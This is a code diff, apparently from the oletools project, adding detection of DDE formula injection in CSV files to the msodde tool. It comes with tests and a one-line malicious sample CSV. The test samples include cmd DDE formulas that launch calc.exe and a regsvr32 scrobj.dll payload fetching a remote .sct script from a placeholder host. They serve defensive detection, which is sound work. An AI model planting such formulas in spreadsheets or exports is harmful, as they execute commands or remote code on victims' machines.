+            file_handle.seek(0)
+            other_delim = CSV_DELIMITERS.replace(dialect.delimiter, '')
+            for delim in other_delim:
+                try:
+                    file_handle.seek(0)
+                    results, _ = process_csv_dialect(file_handle, delim)
+                except csv.Error:  # e.g. sniffing fails
+                    log.debug('failed to csv-parse with delimiter {0!r}'
+                              .format(delim))
+
+        if is_small and not results:
+            # try whole file as single cell, since sniffing fails in this case
+            log.debug('last attempt: take whole file as single unquoted cell')
+            file_handle.seek(0)
+            match = CSV_DDE_FORMAT.match(file_handle.read(CSV_SMALL_THRESH))
+            if match:
+                results.append(u' '.join(match.groups()[:2]))
+
+    return u'\n'.join(results)
+
+
+def process_csv_dialect(file_handle, delimiters):
+    """ helper for process_csv: process with a specific csv dialect """
+
+    # determine dialect = delimiter chars, quote chars, ...
+    dialect = csv.Sniffer().sniff(file_handle.read(CSV_SMALL_THRESH),
+                                  delimiters=delimiters)
+    dialect.strict = False  # microsoft is never strict
+    log.debug('sniffed csv dialect with delimiter {0!r} '
+              'and quote char {1!r}'
+              .format(dialect.delimiter, dialect.quotechar))
+
+    # rewind file handle to start
+    file_handle.seek(0)
+
+    # loop over all csv rows and columns
+    results = []
+    reader = csv.reader(file_handle, dialect)
+    for row in reader:
+        for cell in row:
+            # check if cell matches
+            match = CSV_DDE_FORMAT.match(cell)
+            if match:
+                results.append(u' '.join(match.groups()[:2]))
+    return results, dialect
+
+
 def process_file(filepath, field_filter_mode=None):
-    """ decides which of process_doc/x or process_xls/x to call """
+    """ decides which of the process_* functions to call """
     if olefile.isOleFile(filepath):
-        log.debug('checking streams to see whether this is xls')
+        log.debug('Is OLE. Checking streams to see whether this is xls')
         if xls_parser.is_xls(filepath):
+            log.debug('Process file as excel 2003 (xls)')
             return process_xls(filepath)
         else:
+            log.debug('Process file as word 2003 (doc)')
             return process_doc(filepath)
 
     with open(filepath, 'rb') as file_handle:
-        if file_handle.read(4) == RTF_START:
-            # This is a RTF file
+        if file_handle.read(4) == RTF_START:
+            log.debug('Process file as rtf')
             return process_rtf(file_handle, field_filter_mode)
 
     try:
         doctype = ooxml.get_type(filepath)
-    except Exception:
-        log.debug('Exception trying to xml-parse file', exc_info=True)
+        log.debug('Detected file type: {0}'.format(doctype))
+    except Exception as exc:
+        log.debug('Exception trying to xml-parse file: {0}'.format(exc))
         doctype = None
 
-    if doctype:
-        log.debug('Detected file type: {0}'.format(doctype))
     if doctype == ooxml.DOCTYPE_EXCEL:
-        return process_xlsx(filepath, field_filter_mode)
-    else:
+        log.debug('Process file as excel 2007+ (xlsx)')
+        return process_xlsx(filepath)
+    elif doctype is None:
+        log.debug('Process file as csv')
+        return process_csv(filepath)
+    else:  # could be docx; if not: this is the old default code path
+        log.debug('Process file as word 2007+ (docx)')
        return process_docx(filepath, field_filter_mode)
 
 
-#=== MAIN =================================================================
+# === MAIN =================================================================
 
 def main(cmd_line_args=None):
     """ Main function, called if this file is called as a script
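
The core of the new CSV support is CSV_DDE_FORMAT: a cell like =cmd|'/k calc.exe'!A0 is split into program name, arguments and the trailing item, of which only the first two are reported. A standalone sketch of that match (payload is illustrative):

    import re

    CSV_DDE_FORMAT = re.compile(r'\s*=(.+)\|(.+)!(.*)\s*')
    match = CSV_DDE_FORMAT.match("=cmd|'/k calc.exe'!A0")
    print(u' '.join(match.groups()[:2]))  # -> cmd '/k calc.exe'

For files smaller than CSV_SMALL_THRESH, process_csv() falls back through all CSV_DELIMITERS and finally treats the whole file as one unquoted cell, since csv.Sniffer easily mis-detects dialects on tiny inputs.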
@@ -868,10 +978,10 @@ def main(cmd_line_args=None):
     if args.json and args.loglevel.lower() == 'debug':
         log.warning('Debug log output will not be json-compatible!')
 
-    if args.nounquote :
+    if args.nounquote:
         global NO_QUOTES
         NO_QUOTES = True
-
+
     if args.json:
         jout = []
         jout.append(BANNER_JSON)
@@ -890,7 +1000,7 @@ def main(cmd_line_args=None):
         except Exception as exc:
             if args.json:
                 jout.append(dict(type='error', error=type(exc).__name__,
-                                 message=str(exc)))  # strange: str(exc) is enclosed in ""
+                                 message=str(exc)))
             else:
                 raise  # re-raise last known exception, keeping trace intact
 
tests/msodde/test_basic.py
@@ -17,11 +17,13 @@ from traceback import print_exc
 
 
 class TestReturnCode(unittest.TestCase):
+    """ check return codes and exception behaviour (not text output) """
 
     def test_valid_doc(self):
         """ check that a valid doc file leads to 0 exit status """
-        for filename in ('dde-test-from-office2003', 'dde-test-from-office2016',
-                         'harmless-clean', 'dde-test-from-office2013-utf_16le-korean'):
+        for filename in (
+                'dde-test-from-office2003', 'dde-test-from-office2016',
+                'harmless-clean', 'dde-test-from-office2013-utf_16le-korean'):
             self.do_test_validity(join(BASE_DIR, 'msodde',
                                        filename + '.doc'))
 
@@ -65,9 +67,9 @@ class TestReturnCode(unittest.TestCase):
         except Exception:
             have_exception = True
             print_exc()
-        except SystemExit as se:  # sys.exit() was called
-            return_code = se.code
-            if se.code is None:
+        except SystemExit as exc:  # sys.exit() was called
+            return_code = exc.code
+            if exc.code is None:
                 return_code = 0
 
         self.assertEqual(expect_error, have_exception or (return_code != 0),
@@ -77,9 +79,13 @@ class TestReturnCode(unittest.TestCase):
 
 
 class TestDdeLinks(unittest.TestCase):
+    """ capture output of msodde and check dde-links are found correctly """
 
     def get_dde_from_output(self, capturer):
-        """ helper to read dde links from captured output """
+        """ helper to read dde links from captured output
+
+        duplicate in tests/msodde/test_csv
+        """
         have_start_line = False
         result = []
         for line in capturer:
@@ -90,7 +96,7 @@ class TestDdeLinks(unittest.TestCase):
             elif line == 'DDE Links:':
                 have_start_line = True
 
-        self.assertTrue(have_start_line) # ensure output was complete
+        self.assertTrue(have_start_line)  # ensure output was complete
         return result
 
     def test_with_dde(self):
tests/msodde/test_blacklist.py
@@ -39,8 +39,8 @@ EXAMPLES_MATCH = (
     r'ADVANCE \x 150',
     r'AUTHOR',
     r'AUTHOR "Tony Caruso"',
-    r'BIBLIOGRAPHY \l 1033', # note: the original example has "/l 1033"
-    r'CITATION Ecma01 \l 1033', # note: this also. Hope this is just a typo
+    r'BIBLIOGRAPHY \l 1033',  # note: the original example has "/l 1033"
+    r'CITATION Ecma01 \l 1033',  # note: this also. Hope this is just a typo
     r'COMMENTS',
     r'COMMENTS "I came, I saw, I was not impressed."',
     r'CREATEDATE',
@@ -228,6 +228,7 @@ EXAMPLES_NOMATCH = (
     r'SKIPIF MERGEFIELD Order < 100',
 )
 
+
 class TestBlacklist(unittest.TestCase):
     """ Tests msodde blacklist feature """
 
tests/msodde/test_csv.py 0 → 100644
@@ -0,0 +1,137 @@
+#!/usr/bin/env python3
+
+
+""" Check various csv examples """
+
+import unittest
+from tempfile import mkstemp
+import os
+from os.path import join
+
+from oletools import msodde
+from tests.test_utils import OutputCapture, DATA_BASE_DIR
+
+
+class TestCSV(unittest.TestCase):
+    """ Check various csv examples """
+
+    DO_DEBUG = False
+
+    def test_texts(self):
+        """ write some sample texts to file, run those """
+        SAMPLES = (
+            "=cmd|'/k ..\\..\\..\\Windows\\System32\\calc.exe'!''",
+            "=MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 /s /n /u " +
+            "/i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''",
+            "completely innocent text"
+        )
+
+        LONG_SAMPLE_FACTOR = 100  # make len(sample) > CSV_SMALL_THRESH
+        DELIMITERS = ',\t ;|^'
+        QUOTES = '', '"'  # no ' since samples use those "internally"
+        PREFIXES = ('', '{quote}item-before{quote}{delim}',
+                    '{quote}line{delim}before{quote}\n'*LONG_SAMPLE_FACTOR,
+                    '{quote}line{delim}before{quote}\n'*LONG_SAMPLE_FACTOR +
+                    '{quote}item-before{quote}{delim}')
+        SUFFIXES = ('', '{delim}{quote}item-after{quote}',
+                    '\n{quote}line{delim}after{quote}'*LONG_SAMPLE_FACTOR,
+                    '{delim}{quote}item-after{quote}' +
+                    '\n{quote}line{delim}after{quote}'*LONG_SAMPLE_FACTOR)
+
+        for sample_core in SAMPLES:
+            for prefix in PREFIXES:
+                for suffix in SUFFIXES:
+                    for delim in DELIMITERS:
+                        for quote in QUOTES:
+                            # without quoting command is split at space or |
+                            if quote == '' and delim in sample_core:
+                                continue
+
+                            sample = \
+                                prefix.format(quote=quote, delim=delim) + \
+                                quote + sample_core + quote + \
+                                suffix.format(quote=quote, delim=delim)
+                            output = self.write_and_run(sample)
+                            n_links = len(self.get_dde_from_output(output))
+                            desc = 'sample with core={0!r}, prefix-len {1}, ' \
+                                   'suffix-len {2}, delim {3!r} and quote ' \
+                                   '{4!r}'.format(sample_core, len(prefix),
+                                                  len(suffix), delim, quote)
+                            if 'innocent' in sample:
+                                self.assertEqual(n_links, 0, 'found dde-link '
+                                                 'in clean sample')
+                            else:
+                                msg = 'Failed to find dde-link in ' + desc
+                                self.assertEqual(n_links, 1, msg)
+                            if self.DO_DEBUG:
+                                print('Worked: ' + desc)
+
+    def test_file(self):
+        """ test simple small example file """
+        filename = join(DATA_BASE_DIR, 'msodde', 'dde-in-csv.csv')
+        with OutputCapture() as capturer:
+            capturer.reload_module(msodde)  # re-create logger
+            ret_code = msodde.main([filename, ])
+        self.assertEqual(ret_code, 0)
+        links = self.get_dde_from_output(capturer)
+        self.assertEqual(len(links), 1)
+        self.assertEqual(links[0],
+                         r"cmd '/k \..\..\..\Windows\System32\calc.exe'")
+
+    def write_and_run(self, sample_text):
+        """ helper for test_texts: save text to file, run through msodde """
+        filename = None
+        handle = 0
+        try:
+            handle, filename = mkstemp(prefix='oletools-test-csv-', text=True)
+            os.write(handle, sample_text.encode('ascii'))
+            os.close(handle)
+            handle = 0
+            args = [filename, ]
+            if self.DO_DEBUG:
+                args += ['-l', 'debug']
+
+            with OutputCapture() as capturer:
+                capturer.reload_module(msodde)  # re-create logger
+                ret_code = msodde.main(args)
+            self.assertEqual(ret_code, 0, 'checking sample resulted in '
+                             'error:\n' + sample_text)
+            return capturer
+
+        except Exception:
+            raise
+        finally:
+            if handle:
+                os.close(handle)
+                handle = 0  # just in case
+            if filename:
+                if self.DO_DEBUG:
+                    print('keeping for debug purposes: {0}'.format(filename))
+                else:
+                    os.remove(filename)
+                filename = None  # just in case
+
+    def get_dde_from_output(self, capturer):
+        """ helper to read dde links from captured output
+
+        duplicate in tests/msodde/test_basic
+        """
+        have_start_line = False
+        result = []
+        for line in capturer:
+            if self.DO_DEBUG:
+                print('captured: ' + line)
+            if not line.strip():
+                continue  # skip empty lines
+            if have_start_line:
+                result.append(line)
+            elif line == 'DDE Links:':
+                have_start_line = True
+
+        self.assertTrue(have_start_line)  # ensure output was complete
+        return result
+
+
+# just in case somebody calls this file as a script
+if __name__ == '__main__':
+    unittest.main()
tests/ooxml/test_basic.py
@@ -12,24 +12,33 @@ from oletools import ooxml
 class TestOOXML(unittest.TestCase):
     """ Tests my cool new feature """
 
+    DO_DEBUG = False
+
     def test_all_rough(self):
         """Checks all samples, expect either ole files or good ooxml output"""
         acceptable = ooxml.DOCTYPE_EXCEL, ooxml.DOCTYPE_WORD, \
                      ooxml.DOCTYPE_POWERPOINT
+
+        # files that are neither OLE nor xml:
         except_files = 'empty', 'text'
-        except_extns = '.xml', '.rtf'
+        except_extns = '.xml', '.rtf', '.csv'
+
+        # analyse all files in data dir
         for base_dir, _, files in os.walk(DATA_BASE_DIR):
             for filename in files:
                 if filename in except_files:
-                    #print('skip file: ' + filename)
+                    if self.DO_DEBUG:
+                        print('skip file: ' + filename)
                     continue
                 if splitext(filename)[1] in except_extns:
-                    #print('skip extn: ' + filename)
+                    if self.DO_DEBUG:
+                        print('skip extn: ' + filename)
                     continue
 
                 full_name = join(base_dir, filename)
                 if isOleFile(full_name):
-                    #print('skip ole: ' + filename)
+                    if self.DO_DEBUG:
+                        print('skip ole: ' + filename)
                     continue
                 try:
                     doctype = ooxml.get_type(full_name)
@@ -38,7 +47,8 @@ class TestOOXML(unittest.TestCase):
                 self.assertTrue(doctype in acceptable,
                                 msg='Doctype "{0}" for {1} not acceptable'
                                     .format(doctype, full_name))
-                #print('ok: ' + filename + doctype)
+                if self.DO_DEBUG:
+                    print('ok: {0} --> {1}'.format(filename, doctype))
 
 
 # just in case somebody calls this file as a script
tests/test-data/msodde/dde-in-csv.csv 0 → 100644
@@ -0,0 +1 @@
+=cmd|'/k \..\..\..\Windows\System32\calc.exe'!A0
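
The sample above is the classic one-cell attack of the form =program|arguments!item: here the program is "cmd" with argument "/k \..\..\..\Windows\System32\calc.exe", and "A0" is the (irrelevant) item. Running the new code path over it (sketch; the path is relative to a repo checkout, and the expected output matches test_file in tests/msodde/test_csv.py):

    from oletools import msodde

    print(msodde.process_csv('tests/test-data/msodde/dde-in-csv.csv'))
    # -> cmd '/k \..\..\..\Windows\System32\calc.exe'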
tests/test_utils/output_capture.py
@@ -2,13 +2,20 @@
 
 from __future__ import print_function
 import sys
+import logging
 
 
 # python 2/3 version conflict:
 if sys.version_info.major <= 2:
     from StringIO import StringIO
+    # reload is a builtin
 else:
     from io import StringIO
+    if sys.version_info.minor < 4:
+        from imp import reload
+    else:
+        from importlib import reload
+
 
 class OutputCapture:
     """ context manager that captures stdout
@@ -24,6 +31,10 @@ class OutputCapture:
         # ...or test all output in one go
         some_test(capturer.get_data())
 
+    In order to solve issues with old logger instances still remembering closed
+    StringIO instances as "their" stdout, logging is shutdown and restarted
+    upon entering this Context Manager. This means that you may have to reload
+    your module, as well.
     """
 
     def __init__(self):
@@ -32,6 +43,11 @@ class OutputCapture:
         self.data = None
 
     def __enter__(self):
+        # Avoid problems with old logger instances that still remember an old
+        # closed StringIO as their sys.stdout
+        logging.shutdown()
+        reload(logging)
+
         # replace sys.stdout with own buffer.
         self.orig_stdout = sys.stdout
         sys.stdout = self.buffer
@@ -61,3 +77,7 @@ class OutputCapture:
     def __iter__(self):
         for line in self.get_data().splitlines():
             yield line
+
+    def reload_module(self, mod):
+        """ Wrapper around reload function for different python versions """
+        return reload(mod)
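
Usage sketch for the capture-plus-reload pattern above, as exercised in tests/msodde/test_csv.py: logging is shut down and reloaded on __enter__, so the module under test is reloaded too in order to re-create its logger against the fresh captured stdout (paths assume a repo checkout):

    from tests.test_utils import OutputCapture
    from oletools import msodde

    with OutputCapture() as capturer:
        capturer.reload_module(msodde)  # re-create logger
        ret_code = msodde.main(['tests/test-data/msodde/dde-in-csv.csv'])
    for line in capturer:
        print(line)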